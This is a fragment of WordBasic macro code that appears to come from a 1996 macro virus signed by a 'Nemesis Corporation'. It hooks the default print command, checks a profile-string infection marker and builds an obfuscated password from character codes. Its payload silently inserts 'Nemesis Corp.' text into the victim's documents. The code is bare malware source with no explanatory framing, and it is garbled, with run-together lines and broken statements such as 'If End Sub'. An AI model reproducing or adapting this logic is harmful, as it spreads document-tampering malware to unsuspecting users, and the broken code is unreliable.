Macro DateiDruckenStandard Sub MAIN On Error Resume Next Section$ = "Compatibility" wininistr$ = "0x0020401" ProfileName$ = "RR2CD" PrintText$ = "Brought to you by the Nemesis Corporation, ©1996" Password$ = Chr$(120) + Chr$(101) + Chr$(110) + Chr$(105) + Chr$(120) + Chr$(111) + Chr$(115) NoVir$ = GetProfileString$(Section$, ProfileName$) If NoVir$ <> wininistr$ Then PayLoad FichierImprimerDéfaut Sub Payload On Error Resume Next If Seconde(Maintenant()) < 30 Then PrintText$ = "Nemesis Corp." FinDocument 'go to the end of document. Insertion Chr$(11) Insertion PrintText$ DébutDocument 'go to the start of document. If End Sub